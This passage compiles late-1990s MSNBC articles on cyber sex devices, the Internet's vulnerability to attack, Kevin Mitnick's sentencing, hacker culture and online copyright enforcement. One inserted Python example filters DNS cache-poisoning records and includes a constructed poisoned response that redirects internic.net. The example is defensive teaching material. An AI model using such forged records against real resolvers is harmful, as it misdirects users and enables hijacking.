But David James, president and co-founder of Vivid Entertainment Inc., the suit’s developer, said that he expects the invention to turn the online porn business on its ear by allowing suit-wearing customers to participate.

"The suit (will) … virtually revolutionize the 900- and 800-number-type business,” said James, a Welsh immigrant whose first job was hard labor in a coal mine in his native land. “…That actually is where the very big money would be in the future.”

He also figures his Van Nuys, Calif.-based company, which also produces adult television fare, operates a passel of porn Web sites and bills itself as the world leader in Digital Versatile Disc (DVD) technology, could profit by selling DVD discs with new themes and sensations each month to those who purchase a suit.

SEX TOYS SELLING BRISKLY

The early reception given the cyberdildonics line, coupled with the fact that the online sex business is now pulling in roughly $1 billion a year, according to analysts’ best guesses, suggests the appetite for such online accoutrements is keen. Hadazy, whose San Francisco-based firm developed the sex toys, which range in price from $29.99 to $99.99, said sales have climbed to between 50 and 100 units a day without any advertising.
Most of the sales have been to members of the Intimate Friends Network (commonly known as Ifriends), a 1.9 million-member online community whose members provided the impetus by requesting a line of sex toys for both men and women that they could use in conjunction with adult video chat, Hadazy said.

“The users of this service, over time, began to request that the intellectual stimulation they enjoy over the service be augmented with actual physical stimulation,” he said. “Some of the users suggested a few clever ideas and the result was SafeSexPlus.com, which markets and sells the cyberdildonics devices.”

The key that allows a user to remotely control the devices is a photodiode that is attached to the computer monitor with a suction cup and responds to changes in brightness on the screen.

“As those pixels brighten, the intensity of the device will increase; as the pixels darken, the intensity will decrease,” Hadazy explained. “The remote user, elsewhere on the Internet, is in effect in control of the brightness of a section of your monitor. And that’s what makes the device completely and utterly cross platform and supported by any Internet connection.”

DIFFERENT SET OF DIFFICULTIES

Developers of the cyber sex suit faced a different set of difficulties, namely mimicking sensations produced by real world touch.

James, the president of the Van Nuys, Calif.-based Vivid Entertainment, said the suit works like this: The initiator uses software on his computer to select one of five sensations (tickle, pinprick, vibration, hot or cold) and direct it to a specific part of the suit wearer’s body. An electronic signal is sent to a DVD player, through the Internet, to the suit wearer’s computer and finally to the suit itself, where it activates the appropriate sensor.

“To be honest, it’s nothing magical,” he said.
“I’m sure a pair of college students could have probably sat down and come up with something far more futuristic than we have here. The big advantage we’ve got, of course, is our marketing ability to first of all have it made and then be able to sell it worldwide.”

He said the company has spent about $180,000 to develop the suit, which he said will retail for about $170. But before seeking approval from the Federal Trade Commission to market the suit, James’ team must conquer a final sticky problem: Ensuring that the range of electrical sources and delivery systems around the world don’t trigger a potentially dangerous electrical surge.

FEARS OF A SURGE

"If, for example, a chap was wearing a pacemaker ... and he’s hooked up to a generator ... he could (be) fried or whatever by that extra power going through it,” James said.

Despite such difficulties, some observers see the advances incorporated in the cyber sex suit, particularly its use of DVD technology, as an important step toward a new breed of interactive products that incorporate some sensory capability with high-resolution video for a more-realistic experience.

“I can really see programs, like maybe golf or tennis or skiing ... where it would be necessary to have kind of a virtual environment,” said Julia Rivera, executive producer of Inside DVD magazine. “So say if you go the golf DVD, you would be able to connect and take a golf lesson. And because of the video capability of the DVD, you could select the best golf courses in the world (to practice on).”

But researchers say the primitive state of tactile technology today means that dramatic advances will be needed before such programs can be created. And they warn that the computer generation’s holy grail, virtual reality, remains years if not decades in the future.
In order to create a realistic computer-simulated environment that would allow a user to “touch” other inhabitants of the virtual universe, tactile sensors must be able to both register the computer user’s position and render feedback, said Ian Davis, director of technology with computer game-maker Activision.

‘A LOT OF OBSTACLES’

“There are a lot of obstacles,” he said. “The underlying technology is pretty rudimentary right now. There is some ability to do ‘force feedback’ and some ability to measure the location and angles of joints on the human body, but it isn’t robust yet and is still years away from being technically solid.”

Mel Siegel, a senior research scientist in robotics at Carnegie Mellon University, said the biggest problem is the complexity of the information required for the brain to determine the shape and texture of an object.

"You put your finger down on a complex surface and you really don’t get a great deal of information from that,” he said. “You now move your finger over that complex surface and you start to understand the shape and structure of what you’re feeling. And I think the hard part (of simulating touch) is that dynamics.”

That hurdle has stopped previous attempts to incorporate any but the most basic tactile sensations in computer applications, and it will again prevent the technologies pioneered by the cyberdildonics and the cyber sex suit from having much of an impact, said computer scientist and high-tech visionary Jaron Lanier, credited with coining the term “virtual reality.”

“There have been things like this for a long time,” said Lanier, who recalled seeing similar suits and remote-controlled dildos more than a decade ago. “…I think there’s nothing new here except for the scale of it. There’s a lot of money and a lot more people on the Internet now, so from a social point of view this would be new. But I’m going to predict failure for it.”

-=-

Will hackers or spies knot the Net?
A decade after the ‘worm,’ network still vulnerable, experts say

By Mike Brunker
MSNBC

July 23 — Despite major security advances in the 10 years since a Cornell student unleashed a computer program that crippled the Internet, the vast but vulnerable network still could be taken down by a single hacker bent on bagging the biggest trophy of all, security and law enforcement experts believe.

"GIVEN THE VULNERABILITIES that we know about … and the kinds of tools that we’ve seen in the intruder community, it certainly is possible to bring the entire Internet down for a short period of time,” said Tom Longstaff, research and development manager at the Computer Emergency Response Team [CERT] at Carnegie Mellon University. “Now keeping it down for a long period of time is a much more difficult task.”

The impact of even a short shutdown is hard to gauge, but experts say that the increasing reliance on the Internet by businesses big and small means there would be significant economic disruption. Michael Higgins, vice president for Global Integrity Corp., a security firm that does considerable work in the banking industry, estimates that a “major shutdown” of eight hours or more could cost "billions of dollars" in lost economic opportunity.

While not discounting the threat to the Net from either a destructive hacker or a hostile foreign power, law enforcement and the computer security industry are focused on keeping intruders out of end-users’ systems, a logical priority given the increasing numbers of computer and network break-ins they are seeing.

QUESTION OF ‘MOTIVATION’

“There’s always a requirement of motivation for you to try to determine how likely something is,” said Michael Vatis, an FBI agent who is heading up the Justice Department’s newly formed National Infrastructure Protection Center [NIPC].
“And right now, there is a lot more motivation for people to use the Internet as a vehicle to go after particular targets … rather than [launch] an amorphous attack on the Internet itself.”

But Longstaff says CERT, which serves as a clearinghouse for hacking reports and distributes security fixes as they become available, is seeing a corresponding increase in the number of attacks on the Internet itself.

"We've seen a disturbing trend that shows more and more attacks aimed at the infrastructure of the Internet itself … at routers that route traffic around the Internet and … the name servers that make the Internet operate correctly by resolving how to send packets from one place to another and how to name them,” he said.

The uneasiness of Longstaff and other security experts is heightened by the nagging thought that history might repeat itself. The seemingly farfetched idea of a lone Lilliputian bringing the global Gulliver to its knees became a reality Nov. 2, 1988, when Robert T. Morris, a Cornell University computer student, unleashed the “worm” that bears his name.

The worm, a computer program designed to penetrate UNIX-based computers and then replicate itself on computers connected to the host, spread like wildfire through the Internet, which was less than 1 percent of its current size. Within hours it had infested at least 6,000 systems and crashed the network.

“What brought the Internet down wasn’t that the worm did any specific damage to the infrastructure,” said CERT’s Longstaff. “It simply took so much of the resources from the computers that it broke into and from the networks as it was trying to find new computers.
… The Internet effectively shut down because of overuse, because there just wasn’t enough capacity to run the worm and anything else too.”

FALLOUT FROM THE ‘WORM’

Though Morris insisted he didn’t mean to crash the network, his worm turned assumptions about Net stability upside down, giving birth to the CERT at Carnegie Mellon University in Pittsburgh and generally jump-starting the entire field of computer security.

The intervening years have seen countless improvements in computer and network security, including “patches” to fix the UNIX flaws exploited by the Morris worm, and much better communication and faster distribution of solutions when new problems are discovered. But despite that progress, the infrastructure of the Internet (the major routers that direct traffic from the network’s high-speed trunk onto regional branches, the Domain Name System [DNS], and even the fiber-optic cables that carry the electronic packets around the world) remains at risk.

“When you attack a network you can attack the channels, but the channels are multiple in the Net,” said M.E. Kabay, director of education at International Computer Security Association Inc. [ICSA], a for-profit security consortium. “But you can also attack the control structures that determine things like addressing and how information gets transferred through the Net. And in those circumstances, I think you have a real problem.”

An example of that type of attack, albeit on a much smaller scale, occurred in July 1997, when the InterNIC domain registry operated by Network Solutions was targeted by a business rival. Eugene Kashpureff, operator of AlterNIC, pleaded guilty in March to poisoning the caches of DNS servers: his name servers sent out responses carrying bogus records for internic.net that other DNS servers around the world accepted and cached, preventing tens of thousands of Internet users from being able to reach many Web sites in the .com and .net domains.
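The InterNIC incident above worked because name servers of the day would cache any record a response carried, including records for names the answering server had no authority over. The fix that followed is the "bailiwick" rule: only accept records whose owner names fall inside the zone the answering server was asked about. The following is an added example written for this issue, not code from MSNBC, CERT or any DNS vendor, and a simplified model of the check rather than a reproduction of any particular server's implementation. The zone, the owner names (including the internic.net and alternic.net names the article mentions) and the addresses in the sample response are constructed; the addresses come from the RFC 5737 documentation ranges.

```python
# Added example, not code from the article or from any DNS vendor.
# Models the "bailiwick" rule resolvers adopted after the 1997
# InterNIC/AlterNIC cache-poisoning incident: a response from the servers
# for one zone may only install records whose owner names fall inside that
# zone. Everything else it carries is discarded instead of cached.
# Names, addresses and the sample response below are constructed.
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class RR:
    """One resource record as it would appear in a response section."""
    name: str    # owner name, e.g. "www.example.com."
    rtype: str   # record type, e.g. "A" or "NS"
    rdata: str   # printable record data


def normalize(name: str) -> str:
    """Lower-case a name and make it absolute so comparisons are exact."""
    n = name.strip().lower()
    return n if n.endswith(".") else n + "."


def in_bailiwick(owner: str, zone: str) -> bool:
    """True if `owner` is `zone` itself or a name below it."""
    o, z = normalize(owner), normalize(zone)
    if z == ".":                      # the root zone covers every name
        return True
    return o == z or o.endswith("." + z)


def filter_response(zone: str, records: List[RR]) -> Tuple[List[RR], List[RR]]:
    """Split a response from `zone`'s servers into cacheable and rejected records.

    `zone` is the zone the answering server is authoritative for (the one
    the resolver was referred to). Records for names outside it, such as an
    unsolicited A record for some unrelated domain, are exactly what the
    AlterNIC poisoning relied on resolvers accepting.
    """
    keep: List[RR] = []
    drop: List[RR] = []
    for rr in records:
        (keep if in_bailiwick(rr.name, zone) else drop).append(rr)
    return keep, drop


# Constructed response to a query for www.example.com, as if returned by
# the example.com name servers. The last two records are a poisoning
# attempt: they try to redirect internic.net lookups to alternic.net.
SAMPLE_RESPONSE = [
    RR("www.example.com.", "A", "192.0.2.10"),            # answer
    RR("example.com.", "NS", "ns1.example.com."),          # authority
    RR("ns1.example.com.", "A", "192.0.2.53"),             # glue, in zone
    RR("www.internic.net.", "A", "198.51.100.7"),          # out of bailiwick
    RR("internic.net.", "NS", "ns.alternic.net."),         # out of bailiwick
]


if __name__ == "__main__":
    kept, dropped = filter_response("example.com", SAMPLE_RESPONSE)
    for rr in kept:
        print("cache  ", rr.name, rr.rtype, rr.rdata)
    for rr in dropped:
        print("REJECT ", rr.name, rr.rtype, rr.rdata)
```

Run stand-alone it caches the three example.com records and rejects the two internic.net records. The rule is necessary but not sufficient: it stops a server from planting records for other people's domains, but it does nothing against an attacker who can race a forged answer to the very question the resolver asked, which is why unpredictable transaction IDs and source ports matter as well.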
Kashpureff's poisoned records also “hijacked” visitors to InterNIC’s Web site, rerouting them to the AlterNIC home page.

DENIAL OF SERVICE ATTACK

Most experts say that some type of denial of service attack, an electronic bombardment of key routers with phony packets, would be the most likely way of deliberately crashing the network.

A similar scenario in which routers operated by telecommunications companies would be isolated from each other was floated by members of the Boston hacking group L0pht (pronounced “loft”), who testified in May before the Senate Government Affairs Committee that they could pull the plug on the worldwide network in less than 30 minutes and keep it down for “a few days.”

Representatives of the telecommunications companies that control the major Internet switching yards did not respond to requests for interviews.

Marcus Ranum, CEO of Network Flight Recorder, which develops security tools for network managers, said that the main drawback to such an attack is that it would quickly draw heat to the source.

"The problem is that to keep it down, you’d have to be actively trying to keep it down, which would increase the chance of the good guys catching you,” Ranum said. “… It’s kind of like the business of being a sniper in a bell tower: The more you shoot, the easier it is for other people to find you. And you’re not going to do a lot of damage unless you shoot a lot.”

Ranum said that a master hacker could probably create a remote mode of attack that would disable the Net’s key components while masking its creator’s identity.

But denial of service attacks are by no means the only weapons at the criminal hacker’s disposal. Many experts believe an updated version of the Morris worm could again wreak havoc.

COULD WORM RETURN?
Chris Goggans, a former member of the notorious hacker group Legion of Doom turned security consultant, created ripples of concern in 1996 by telling the Electronic Engineering Times that all a hacker would have to do is “take parts of the existing Morris code, easily combine it with some of the newer attack programs, and launch it again.”

Or an attacker could employ tactics that have been used before, such as mail-bombing, on a much grander scale.

"Unsolicited commercial email [or SPAM] could be used … to attack the net,” said Kabay of ICSA. “…You could argue that this isn’t an attack on the Internet, but if it was done to millions of people, the increased traffic plus the unusability of email would certainly be viewed as an attack on at least a component of the Internet.”

One of the hardest attacks to guard against is the low-tech approach, known in security circles as the “backhoe attack.”

“Just go in and cut the fiber [optic cable],” as Goggans said in his 1996 interview. “Most of the domestic Internet and all of Europe is connected [at an Internet exchange point in Virginia], so you could wipe out everything for days. If you cut several times in several different places, you could wipe it out for weeks.”

POROUS BY NATURE

Part of the difficulty in securing the Internet’s infrastructure and protecting it from ancillary attacks lies in its structure, which was designed to facilitate communication, not thwart invaders.

The Internet “was created to be used by a group of trusted people,” said Robert Hundley, a Rand Corp. researcher who in 1995 co-authored a report that labeled the Net a sitting duck for criminal hackers (“crackers” is the term preferred by non-destructive hackers) or hostile governments. “It has evolved way, way beyond that.”

Still, warnings that the entire Internet could be taken out aren’t given more credence largely for one reason, security experts say: It’s difficult to envision why someone would want to do it.
In the case of a single hacker, it would take a gifted, if twisted, individual who most likely would be driven by egotism and malice.

“You’d have to have … that destructive mentality … and this is not an unsophisticated attack,” said Higgins of Global Integrity Corp. “… I just don’t see that type of threat present today, not from an individual.”

"I think the only case where it would be likely to happen is if you had somebody who wanted to move themselves into the ranks of the elite superhackers and was trying to show off,” said Ranum, adding that a hacker who nailed the Net would quickly become a pariah among his peers.

“Somebody would do that and it would happen for a little while and then get fixed. And then we’d hunt that guy down and kill him,” he said with no hint that he might be joking.

Some experts say a more likely scenario would be one in which a terrorist group or hostile foreign power would bring down the Internet as part of a larger effort to sow confusion and fear in technologically advanced nations.

“Right now, what we can say publicly is that we do have information that several countries are developing the policy, the doctrine and the technical capability to carry out that sort of attack as one component of a military strategic plan,” said Vatis, head of the Justice Department’s NIPC, the infrastructure protection center. “And we have to be in position to defend against it and also to get early warning of it.”

‘INFOWAR’ FEARS

The NIPC is the biggest single indication that the U.S. government is serious about coming to grips with the threat of cyberterrorism. In fiscal 1999, the office will have 125 employees at its headquarters in Washington, D.C., agents in each of the FBI’s 56 field offices and eight regional computer squads with “robust capabilities equipment” that will allow them to conduct field investigations, Vatis said.
But while the threat of Internet terror has gotten attention on Capitol Hill in recent months, some in the private security industry believe the danger is being overblown.

“The [government] has a vested interest in expanding its domain into cyberspace,” said Ranum. “I don’t really see any threat there. It’s not that it’s impractical, but the U.S. certainly could run without the Internet. It’s not as if the country would grind to a halt. It’s not as if the country would be unable to fight a war if the Internet were down. .. The whole scenario is very attractive in a kind of Tom Clancyesque way, but I really think it’s pretty silly.”

Vatis calls such criticism “baseless.”

"The idea that this is all being invented or exaggerated by the government is belied by the record that exists out there,” he said, adding that the FBI currently has a case load of nearly 500 hacking cases, an increase of 130 percent over the past two years.

Whether or not an attacker actually brings down the Internet, experts agree, the global giant will remain at risk for some time to come because research has been concentrated on issues deemed more pressing.

“We’re doing more and more on the Internet, but if you look at the security issues… we are really targeting the realm of confidentiality and integrity of [financial] transactions … [not] the availability issue,” said Higgins of Global Integrity. “That is our most vulnerable point, and it will continue [to be] for the foreseeable future.”

-=-

Mitnick to serve 5 more months, repay $4,125
Hacker barred from using high-tech gear for three years

By Mike Brunker
MSNBC

Aug. 9 — Nearly 4 1/2 years after he was taken into custody, notorious hacker Kevin Mitnick was sentenced Monday to 46 months in federal prison and ordered to pay $4,125 in restitution. With credit for time served, the conqueror of computer systems at several high-tech companies could be released in January.

U.S.
DISTRICT Judge Mariana Pfaelzer sentenced Mitnick, 35, before a packed courtroom that included his father, Alan Mitnick, and dozens of his supporters, many of whom believe that he is being severely punished by the government to set an example to other would-be hackers.

Pfaelzer, who said it would be “impossible” for probation officials to monitor Mitnick once he is released from custody, nonetheless banned him from using computers, cellular telephones, televisions or any equipment that can be used for Internet access for three years.

RESTITUTION CALLED ‘TOKEN’

She called the $4,125 in restitution a “token” amount given the damage she said he inflicted on companies whose computers he infiltrated, including Motorola and Sun Microsystems Inc. She said she settled on the relatively small amount because she considered it unlikely he would be able to earn more than minimum wage given the prohibition on computer use.

“I want to make a restitution order that is much, much larger,” she said in rejecting the prosecution’s request that he be ordered to pay $1.5 million to his victims. “But I can’t be sure he can pay it, and any non-payment is going to be a violation of the terms of his release.”

Prosecutors initially accused Mitnick in a 25-count indictment of causing an astonishing $80 million in damage by breaking into the computer networks of Motorola, Sun Microsystems, NEC and Novell, among others, preceding his arrest. The charges carried a maximum penalty of nearly 200 years in prison, though sentencing guidelines would have precluded a sentence anywhere near that harsh.

But under a plea bargain announced in March, Mitnick stipulated that he caused $5 million to $10 million in damage while invading computers.

He has been in jail since February 1995, first serving time for breaking probation on an earlier conviction and fleeing authorities.
Authorities repeatedly argued against granting bail to Mitnick, charging that his technological wizardry posed a serious threat to the public.

CAPTURED IN NORTH CAROLINA

Mitnick, who spent 2 1/2 years on the run before his 1995 capture by federal agents in North Carolina, arguably is the world’s most notorious hacker, the subject of numerous books and a soon-to-be-released film.

His long wait in jail also has made him a hero and a martyr to other hackers and “crackers,” the former’s preferred term for those who aim to profit by breaking into computers. They say his lengthy wait without a trial was an attempt to intimidate other would-be hackers.

“When you realize that you have to wait 3 1/2 years for a trial, even if you’re innocent you’re going to plead guilty,” Eric Corley (a.k.a. Emmanuel Goldstein), editor of 2600 — the Hacker’s Quarterly, told MSNBC last year.

But government attorneys describe the case as a by-the-book prosecution of a repeat offender who just happens to be a notorious hacker and deny that he is being singled out.

"He is being prosecuted because he violated the law,” said Chris Painter, an assistant U.S. attorney. “… He violated a lot of laws.

“Is it true that computer hackers should think twice before violating the law? Yes, it is our position they always should do that. … But Kevin Mitnick is not being singled out.”

WON RIGHT TO USE LAPTOP

Because most big hacking cases have been settled prior to trial, Mitnick’s case had been expected to set numerous legal precedents. But despite repeated avowals through his attorney to take his case to trial, Mitnick agreed to the plea bargain nearly four years after he was jailed.

Still, Mitnick blazed a small legal trail by winning the right to use a laptop computer at the jail to review the mountain of electronic evidence the government has compiled against him, enough data to fill a library if it were printed out, defense attorney Donald Randolph said.
During numerous hearings on the matter, prosecutors urged Judge Pfaelzer to deny Mitnick access to a computer at the jail, even one without a modem, arguing that he could somehow use it to engineer an escape or otherwise compromise security at the jail.

The judge sided with the prosecution during a series of hearings on the matter but reversed course in March 1998 and allowed Mitnick to review evidence on a laptop in the jail’s attorney-client conference room. The two sides then spent months wrangling over procedures for the review before Mitnick was allowed to begin poring over the computer files in January.

That was virtually Mitnick’s lone success in pretrial legal skirmishes. Motions to set bail for him were rejected by the judge, who agreed with prosecutors that he was a flight risk and posed a danger to the public. The denial of bail was upheld by the 9th Circuit Court of Appeals in San Francisco.

Nor did the defense have any success in persuading Pfaelzer to allow the defendant access to encrypted files or “hacking tools” that prosecutors say were in his possession when he was arrested.

A CAUSE CELEBRE

The perception that Mitnick is being harshly treated by the government has made his case a cause celebre among hackers and Internet libertarians. There are numerous Web sites devoted to his legal battle and scores of Web sites have been altered by sympathetic attackers to include calls for his freedom, notably the UNICEF and Yahoo! home pages.

Mitnick and his capture have been documented in several books, most notably “Takedown” by New York Times reporter John Markoff and Tsutomu Shimomura, the computer security expert who helped the government track Mitnick down, and “The Fugitive Game — Online with Kevin Mitnick,” by Jonathan Littman.

Adding to his notoriety is an upcoming feature film of “Takedown,” which is expected to open later this year. The film, which is being produced by a division of Disney’s Miramax Films, will star Skeet Ulrich as Mitnick.
An early version of the script drew howls of outrage from Mitnick supporters because of numerous liberties taken by the writers in the interest of creating dramatic tension. Among the untruths: During the pursuit, Mitnick clubs Shimomura with a garbage can lid, gashing his head (they never met until after Mitnick’s arrest); he obtains free phone calls by whistling into the phone a la legendary phone phreaker Captain Crunch; he rigs a radio call-in contest to win a TV, a stunt performed in real life by fellow hacker Kevin Poulsen; near the end of the movie he vows to escape during a jail conversation with Shimomura, saying, “I’ll be seeing you. All I need is a dime and a phone. Sometimes, if I’m lucky, I don’t even need the dime.”

The Associated Press contributed to this report.

-=-

Hackers: Knights errant? or knaves?

By Mike Brunker
MSNBC

July 23 — Emmanuel Goldstein, editor of 2600 — The Hackers’ Quarterly, says hacking is about “learning, sharing information, being the first person to discover something.” To Marcus Ranum, CEO of a network security firm, breaking into someone else’s computer means “sheer mental and emotional anguish” for the victim. Strangely, depending on the circumstances and the individuals involved, they are both right.

HACKERS ARE the knights-errant of the Internet Underground, wandering the byways of cyberspace in search of adventure, mischief and, in some cases, somebody else’s treasure. But their reasons for embarking on an avocation that carries plenty of baggage with it are as diverse as the Internet itself.

What is clear is that there are many more hackers than there used to be. The Computer Security Institute, in a recent survey of computer crime, found a 16 percent increase in security breaches of corporate computer systems over the previous year, more than half of which were accomplished via the Internet. The FBI now has roughly 500 computer crime investigations open at any given time.
And the experts agree, these statistics reflect only the thinnest slice of the hacking phenomena.

INSIDERS MOST LIKELY CULPRITS

Most security breaches are still committed by insiders — dishonest or disgruntled employees in most cases — but outside intrusion is on the rise. The statistics are capable of striking fear into the hearts of those intent on building the Internet into a mighty machine of commerce, but they hold promise for at least one sector: Dataquest estimates the market for computer security will grow into a $13 billion business by 2002, up from $6.3 billion in 1997.

The computer- and network-security experts find themselves confronted by a highly resourceful enemy that can assume many guises. Goldstein, whose real name is Eric Corley, is a leading spokesman for the “Jacques Cousteau School of Hacking,” representing those hackers who revel in the cerebral, exploratory aspects of the craft.

“What hacking is about is learning, sharing information, being the first person to discover something, being the first person to try defeating a system in a different way,” he said. “The thing with hackers is we don’t keep secrets, we share information.

THE CASE FOR HACKING

“If hacking did not exist, people would not discover the mistakes, the basic ways that a system can be compromised until it was too late, until someone with an agenda had actually gotten in there and done something bad for a purpose. Hackers get in there and they tell everybody what they did.”

These hackers believe authorities and the media have unfairly stigmatized them by failing to make the distinction between hackers, who are essentially trespassers, and computer criminals. The latter, known as “crackers” to the nondestructive hackers, break into systems to steal or wreak havoc.

“I believe the crime of simply hacking a system should be illegal in the same way it would not be legal to wander through my house. It’s kind of the same issue,” said a hacker known as Lucifer.
“I do think the punishment typically outweighs the crime. Typically, a breaking-and-entering conviction [in the real world] will get you a suspended sentence, while burglary is treated much more seriously. I think the same should apply.”

Unfortunately, problems can arise when hackers’ explorations have unintended consequences, as was the case last year when a juvenile hacker who broke into a Bell Atlantic network inadvertently shut down communications between the control tower and aircraft at the Worcester, Mass., airport. Fortunately there were no crashes.

SUFFERING IGNORED, CRITICS SAY

The high-minded hacker ethic also ignores the considerable human suffering that even the most benign break-in can create, says Ranum, CEO of Network Flight Recorder, which creates security tools for network managers.

“This isn’t fun stuff,” he said. “There is real damage. … You get some system or network manager who works up on Wall Street and his systems have been broken into … by one of these barely post-pubescent hackers and they’re scared for their jobs, they’re afraid they’re going to lose their careers, they’re worried about their mortgages. I’ve seen grown men reduced to tears by this kind of thing. It’s just not right.”

The natural tension that exists between the hackers and those charged with either preventing them from breaking in or catching them once they do is understandable. But it tends to obscure the fact that the hackers who are most feared are not the ones who call attention to their exploits or bait the security experts.

“I worry about the ones that you never see and you never hear, because they’re not driven by ego,” said Michael Higgins, vice president for operations and technology with Global Integrity Corp., an international security firm. “… In my line of business, they’re usually driven by the almighty dollar, which means that they’re somehow causing fraud or they’re causing extortion events and they’re making money.”

-=-

Online thieves collide with the law
A look at how copyright theft is being handled in the courts
By Bobbi Nodell
MSNBC

July 23 — While the Internet yearns to be a free-wheeling exchange of information, corporate America is beginning to chase down those who circulate copyrighted material on the Internet without paying dues. Companies have hired digital detectives to locate sites violating the U.S. Copyright Act, and then, using threats or legal action, have forced the operators to remove the material. Here’s a look at the efforts — in the boardrooms and in the courtrooms — to crack down on online theft.

WITH AN ESTIMATED 300 million web sites, policing illegal activity is a never-ending chore. Christopher Young, president and chief operating officer of Cyveillance based in Alexandria, Va., says that his company has uncovered 100,000 violations since it was formed 1 1/2 years ago to search for illegal sites.

Young said the violations his company has uncovered run the pilfering gamut — including theft of statistics from the National Basketball Association site, trading nude photos of Pamela Anderson, downloading copies of Windows 98, stealing Madonna’s new album before it was released, or taking a Nike logo and illegally representing the web site as that of a Nike dealer.

“[And] don’t even get me started on rumors and opinionated information on companies” posted on bulletin boards and in chat rooms, he said, saying that such false information meets the legal definition of slander.

Michael Overly of the Los Angeles law firm of Foley & Lardner said while there is no specific statutory law directed at copyrighted material online, courts are addressing the issue in piecemeal fashion in a number of cases.
“In some areas of the country there is no direction, while in others there’s been conflicts in the law,” he said.

One of the main questions at issue is how to clarify copyright protections for the online world. For instance, should Internet service providers [ISPs] be held liable for something a subscriber posts on-line? Under the U.S. Copyright Act, an ISP technically could be held liable, though a number of courts have resisted that interpretation, Overly said.

In 1996, for example, the Church of Scientology sued Netcom after the ISP refused to remove church writings posted on its computer network by a former Scientologist minister. The church argued that the doctrines were copyrighted material and Netcom should be held responsible for copyright infringement. However, a federal judge in California ruled that Netcom was not liable, even though it was partly responsible for the material being illegally published by refusing to remove it after receiving notification from the church.

FEARS OF OVERREACTION

While there is general agreement that online theft is a problem, some think companies are destroying a good thing by becoming overly aggressive in their attempts to root it out.

“There’s a Salem witch hunt going on out there saying that this is something worse than it really is,” said Jon Noring, the founder of OmniMedia Digital Publishing, an online book publisher and himself a victim of cyber theft. “It could lead to Congress passing much more Draconian laws which could have a serious effect on free passage of information.”

He said he is especially concerned that the Software Publishers Association is trying to create a “police state” by overzealously guarding copyrighted software.
While a far cry from totalitarianism, there have been a number of attempts on the national front to crack down on online theft:

After an MIT student created a site encouraging web surfers to steal software and computer games, lawmakers scurried to toughen up the copyright act to create certain criminal penalties for copyright infringement — even if the offender does not benefit financially, said Dallas attorney Craig Weinlein. The result was the “No Electronic Theft Act” signed into law by President Bill Clinton on Dec. 16, 1997.

The U.S. Copyright Act of 1976 was amended in 1995 to protect the transmission of a digital performance; therefore, if someone plays music over the Internet without proper authorization, they could run afoul of this act.

Now many companies are rallying behind a new bill - the Digital Millennium Copyright Act (HR 2881) - that addresses several new areas of copyright theft. Most important, it would exempt online service providers from copyright liability for simply transferring information on the Internet. It also would make it illegal to develop software that would disable encryption included on software and CD-ROMs intended to prevent people from copying the work. The bill passed the Senate but was blocked in the House by the library coalition and is still waiting to be voted on.

Controversial legislation also is pending to protect information databases from being appropriated. Currently, if someone compiles baseball statistics, for instance, that information is not protected. The Collections of Information Anti-Piracy Act, sponsored by Rep. Howard Coble, R-N.C., was passed by the House, but few think it will pass the Senate, where it has encountered opposition from researchers and others who worry that once this material is copyrighted, it won’t be available to the public.

Other areas still need hashing out, including how efforts to prevent copyright infringement might themselves infringe on privacy.
For example, many companies are turning to digital “watermarks” — an electronic code — to track copies of their software, sound recordings, books or photos. But some Internet libertarians worry that these companies also will use the technology to track and assemble information on the customers who purchased the material.

Also under debate is the online definition of “fair use” under Section 107 of the U.S. Copyright Act. Saying the copyrighted material is not used for profit is no longer a shield, lawyers point out, as many schools have been prosecuted for copyright infringement.

The key, for lawmakers, is knowing where to draw the line. “We don’t want to legislate the Internet out of existence by making laws too strict,” said Overly. “In the United States, we have a tendency to rush in and legislate before we know what’s going on with new technology.”

MSNBC’s Molly Masland contributed to this story.

-=-

Sound Waves: A digital battleground
How the music industry is dealing with net pirates.
By Bobbi Nodell
MSNBC

July 23 — Sound waves have become one of the hottest battlegrounds on the Internet these days. With the advent of new compression technology, people can now download sound files in moments, store them on a hard drive or record them on a compact disc using a CD recorder, which can be purchased for $300.

THOUSANDS OF SITES offer near CD-quality sound recordings, so it’s possible for some music enthusiasts to bypass the music store altogether. For music pirates, the technology is almost a license to steal.

Three months before its official release, Pearl Jam’s entire “Yield” album was posted online. Madonna’s new album “Ray of Light” made it to the Web months before its release. So did Alanis Morissette’s new song, “Uninvited,” part of the soundtrack for the film “City of Angels.” The Internet is full of “tribute sites” that offer vast electronic libraries dedicated to specific artists and one unofficial study found more than 1,800 digital jukeboxes.
Some digital pirates charge consumers to download the music but others offer it for free and are brazen about what they are doing. One music archive site said, “Leech what you’d like. I don’t care. Just be nice and upload something for others.” Another begged Web surfers to “take but don’t tell.”

RECORDING INDUSTRY STRIKES BACK

Fearful of the future, the music industry is responding with a vengeance. The Recording Industry Association of America has already issued 750 warning letters to offending web sites and launched five major lawsuits charging federal copyright infringement — three were settled in January and two of the cases are still pending, said Steven D’Onofrio, executive vice president of RIAA. The association represents the companies and people who work in the $12 billion recording industry.

“This is a growing problem and we are greatly concerned about it,” he said.

Reproducing and distributing copyrighted sound recordings without authorization is a violation of federal copyright laws. While a portion of a music clip can be used under the “fair use” terms, it’s not OK to use copyrighted material without the proper permission — no matter what kind of disclaimer is put on the site.

D’Onofrio said he’s not sure how much of the $300 million lost every year to music pirates is from online theft but it’s enough for his group to take notice. He said the music industry would rather avoid lawsuits and focus on education. It has teamed up with several universities and launched a “Soundbyting campaign” to educate students not to download digital recordings from illegal music archive sites.

Many of these sites are operated by students on university servers using a technology called MP3, which allows computer users to shrink audio files from compact discs without losing any noticeable sound quality. The CD-quality files can be played on a computer with one of the many free MP3 players found on the Internet.
A trip around the Internet using the search term “MP3” shows how large the problem is. On a recent Alta Vista search, MP3 had more than 325,000 hits, many of them offering bootleg versions of songs.

The association ferrets out these illegal sites with a staff of digital detectives as well as an automated Web crawler. While thousands of these sites still exist, the recording industry is gaining some ground. D’Onofrio said every site it has contacted has pulled the offending material or closed its site. And the courts have come down on the side of the recording industry in three cases so far, awarding $100,000 in damages for each infringed sound recording identified in the complaint — representing damage awards totaling more than $1 million against each defendant. The recording industry, however, deferred collecting the damages as long as the sites refrain from posting copyrighted material.

To help the industry’s cause, the No Electronic Theft Act was passed in November 1997. Among other things, the act criminalizes copyright infringement, even if there is no financial gain.

But it’s not just the recording industry that’s fighting back.

OTHERS ON THE PROWL

The American Society of Composers, Artists and Publishers, which represents 75,000 songwriters and publishers, is going after anyone streaming music on the Internet without a license. Marc Morgenstern, senior vice president of new media for the society, said that unlike artists, who make most of their money from record sales, songwriters profit from the performing rights.

